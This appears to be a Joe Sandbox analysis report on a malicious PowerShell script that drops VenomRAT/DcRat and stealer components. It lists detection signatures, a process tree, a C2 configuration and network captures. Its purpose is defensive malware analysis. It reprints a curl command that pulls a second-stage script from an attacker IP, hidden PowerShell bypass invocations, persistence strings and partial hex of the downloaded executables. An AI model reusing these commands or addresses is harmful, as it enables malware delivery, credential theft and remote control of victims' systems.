Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
trwsfg.ps1

Overview

General Information

Sample name:trwsfg.ps1
Analysis ID:1582969
MD5:22bae550672a11587c37ebb8dabeefef
SHA1:5c7951317700fd35bbfd39499473889c752f9164
SHA256:569775b523c853aa351d5832df2fdbb68fdaa8c05f9cc67289921f00a66c0157
Tags:147-45-44-131185-149-146-164bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected AveMaria stealer
Yara detected BrowserPasswordDump
Yara detected DcRat
Yara detected Keylogger Generic
Yara detected Powershell download and execute
Yara detected StormKitty Stealer
Yara detected Strela Stealer
Yara detected VenomRAT
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Compiles code for process injection (via .Net compiler)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powerup Write Hijack DLL
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\trwsfg.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7748 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7764 cmdline: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • curl.exe (PID: 7788 cmdline: curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • powershell.exe (PID: 7772 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 7908 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 7924 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3454.tmp" "c:\Users\user\AppData\Local\Temp\03bjtjx4\CSCBF3C1B7A512F4AE098C09161EC8504E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • RegAsm.exe (PID: 7976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Ave Maria, AveMariaRAT, avemariaInformation stealer which uses AutoIT for wrapping.
  • Anunak
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, 404KeyLogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
{"Server": "157.20.182.177", "Port": "4449", "Version": "RAT + hVNC  6.0.5", "MutexName": "zxfcrdrxsqxt", "Autorun": "false", "Group": "false"}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0x282807:$a1: havecamera
  • 0x2d4483:$a2: timeout 3 > NUL
  • 0x2d7c84:$a3: START "" "
  • 0x2d81df:$a3: START "" "
  • 0x2d80ba:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
  • 0x2d8157:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x2d3cad:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }}
  • 0x2cf839:$s6: VirtualBox
  • 0x2e0ba4:$s6: VirtualBox
  • 0x2dbf01:$s8: Win32_ComputerSystem
  • 0x2e0b0a:$s8: Win32_ComputerSystem
  • 0x2d8b17:$s9: Win32_Process Where ParentProcessID=
  • 0x2d86a2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x2d88e6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x2d89ce:$cnc4: POST / HTTP/1.1
SourceRuleDescriptionAuthorStrings
00000008.00000002.4131974339.000000000318B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DcRat_2Yara detected DcRatJoe Security
    00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VenomRATYara detected VenomRATJoe Security
      00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
        00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_BrowserPasswordDump_1Yara detected BrowserPasswordDumpJoe Security
            Click to see the 43 entries
            SourceRuleDescriptionAuthorStrings
            4.2.powershell.exe.277af070e20.0.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x5c8:$x2: https://github.com/LimerBoy/StormKitty
            • 0x5e4:$x3: StormKitty
            4.2.powershell.exe.277af06a9f0.1.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x69f8:$x2: https://github.com/LimerBoy/StormKitty
            • 0x6a14:$x3: StormKitty
            4.2.powershell.exe.277ad61cd00.5.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x5c8:$x2: https://github.com/LimerBoy/StormKitty
            • 0x5e4:$x3: StormKitty
            4.2.powershell.exe.277aef9f226.6.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x5c8:$x2: https://github.com/LimerBoy/StormKitty
            • 0x5e4:$x3: StormKitty
            4.2.powershell.exe.277ad5d9448.4.raw.unpackMALWARE_Win_StormKittyDetects StormKitty infostealerditekSHen
            • 0x43e80:$x2: https://github.com/LimerBoy/StormKitty
            • 0x43e9c:$x3: StormKitty
            Click to see the 116 entries

            System Summary

            barindex
            Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7528, TargetFilename: C:\Windows\Temp\Modules.bat
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\trwsfg.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\trwsfg.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\trwsfg.ps1", ProcessId: 7528, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline", ProcessId: 7908, ProcessName: csc.exe
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7528, TargetFilename: C:\Windows\Temp\Modules.bat
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1 , CommandLine: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1 , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7748, ParentProcessName: cmd.exe, ProcessCommandLine: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1 , ProcessId: 7764, ProcessName: cmd.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7772, TargetFilename: C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\trwsfg.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\trwsfg.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\trwsfg.ps1", ProcessId: 7528, ProcessName: powershell.exe

            Data Obfuscation

            barindex
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7528, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.cmdline", ProcessId: 7908, ProcessName: csc.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-01T08:48:10.465456+010028424781Malware Command and Control Activity Detected157.20.182.1774449192.168.2.449733TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
            Source: 00000008.00000002.4131974339.0000000002F51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VenomRAT {"Server": "157.20.182.177", "Port": "4449", "Version": "RAT + hVNC 6.0.5", "MutexName": "zxfcrdrxsqxt", "Autorun": "false", "Group": "false"}
            Source: trwsfg.ps1Virustotal: Detection: 11%Perma Link
            Source: trwsfg.ps1ReversingLabs: Detection: 21%
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTR
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Source: C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.dllJoe Sandbox ML: detected
            Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000004.00000002.1883771714.00000277C5514000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ws\System.Core.pdb source: powershell.exe, 00000004.00000002.1882807571.00000277C5156000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 4.pdb source: powershell.exe, 00000004.00000002.1883771714.00000277C5549000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.pdbhPu source: powershell.exe, 00000004.00000002.1800480910.00000277AEFB4000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\03bjtjx4\03bjtjx4.pdb source: powershell.exe, 00000004.00000002.1800480910.00000277AEFB4000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDBt source: powershell.exe, 00000004.00000002.1883771714.00000277C54D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000004.00000002.1883771714.00000277C5514000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: 4.pdb9 source: powershell.exe, 00000004.00000002.1883771714.00000277C5549000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\System32\curl.exe

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 157.20.182.177:4449 -> 192.168.2.4:49733
            Source: Yara matchFile source: 4.2.powershell.exe.277bdaf215a.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd4046b2.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.4:49733 -> 157.20.182.177:4449
            Source: global trafficTCP traffic: 192.168.2.4:53882 -> 162.159.36.2:53
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 Jan 2025 07:48:04 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 28 Dec 2024 19:39:12 GMTETag: "8e00-62a59bbda5efb"Accept-Ranges: bytesContent-Length: 36352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 38 bc c7 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 83 00 00 00 20 00 00 00 84 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 c0 00 00 00 06 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 00 00 00 02 00 00 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc a2 00 00 00 00 00 00 48 00 00 00 02 00 05 00 44 22 00 00 68 80 00 00 03 00 02 00 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 05 00 a9 00 00 00 01 00 00 11 73 0f 00 00 0a 0a 73 10 00 00 0a 0b 07 28 11 00 00 0a 03 6f 12 00 00 0a 6f 13 00 00 0a 0c 06 08 6f 14 00 00 0a 06 17 6f 15 00 00 0a 06 18 6f 16 00 00 0a 1f 10 8d 1c 00 00 01 0d 02 16 09 16 09 8e 69 28 17 00 00 0a 06 09 6f 18 00 00 0a 02 8e 69 09 8e 69 59 8d 1c 00 00 01 13 04 02 09 8e 69 11 04 16 11 04 8e 69 28 17 00 00 0a 06 6f 19 00 00 0a 13 05 11 05 11 04 16 11 04 8e 69 6f 1a 00 00 0a 13 06 de 20 11 05 2c 07 11 05 6f 1b 00 00 0a dc 07 2c 06 07 6f 1b 00 00 0a dc 06 2c 06 06 6f 1b 00 00 0a dc 11 06 2a 00 00 00 01 28 00 00 02 00 74 00 12 86 00 0c 00 00 00 00 02 00 0c 00 86 92 00 0a 00 00 00 00 02 00 06 00 96 9c 00 0a 00 00 00 00 13 30 02 00 19 00 00 00 02 00 00 11 02 28 1c 00 00 0a 03 28 01 00 00 06 0a 28 11 00 00 0a 06 6f 1d 00 00 0a 2a 1e 02 28 1e 00 00 0a 2a 00 00 00 13 30 07 00 9e 00 00 00 03 00 00 11 72 01 00 00 70 0a 73 1f 00 00 0a 73 20 00 00 0a 0b 07 6f 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 Jan 2025 07:48:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 28 Dec 2024 19:34:32 GMTETag: "2fdc00-62a59ab2b1730"Accept-Ranges: bytesContent-Length: 3136512Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 be e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 e8 2f 00 4b 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 c8 2f 00 00 20 00 00 00 ca 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f7 0d 00 00 00 00 30 00 00 0e 00 00 00 cc 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 30 00 00 02 00 00 00 da 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e8 2f 00 00 00 00 00 48 00 00 00 02 00 05 00 18 00 14 00 58 e8 1b 00 01 00 00 00 c5 08 00 06 18 47 12 00 fe b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c c3 df 8f 3c 11 bd ff 34 87 b1 23 14 56 06 77 83 64 21 f6 ae ea 92 48 41 5a d4 f4 e9 cb 91 b0 af f6 49 f6 31 fe 0b 17 da cb 0b c6 59 cd b0 54 38 44 e3 bf 63 5b db 81 ef 32 94 82 dc bc a4 15 ec 6e 6a 6c 4f ca 73 5d 79 78 af 3c 8f 6d 74 38 2a ad 8e 04 fd f1 d9 42 ea a1 c0 ca 2d 1d 1e 72 49 18 a3 ca 67 a3 fa 83 3a fe 6d c8 00 65 80 c0 b1 cd 1f 89 87 cf a0 e4 6a 7b 55 6d 37 ff 10 39 99 3b 0d 11 ce 24 89 51 57 a9 9a d9 1e d7 41 41 30 56 30 79 d5 68 60 34 62 45 eb b4 89 3d f7 f7 b8 57 00 07 80 c2 18 00 be 4d 9a 26 2c 91 ed 43 ae 09 85 03 3a f6 5d 29 17 23 eb cb 6c ab 41 47 38 e9 42 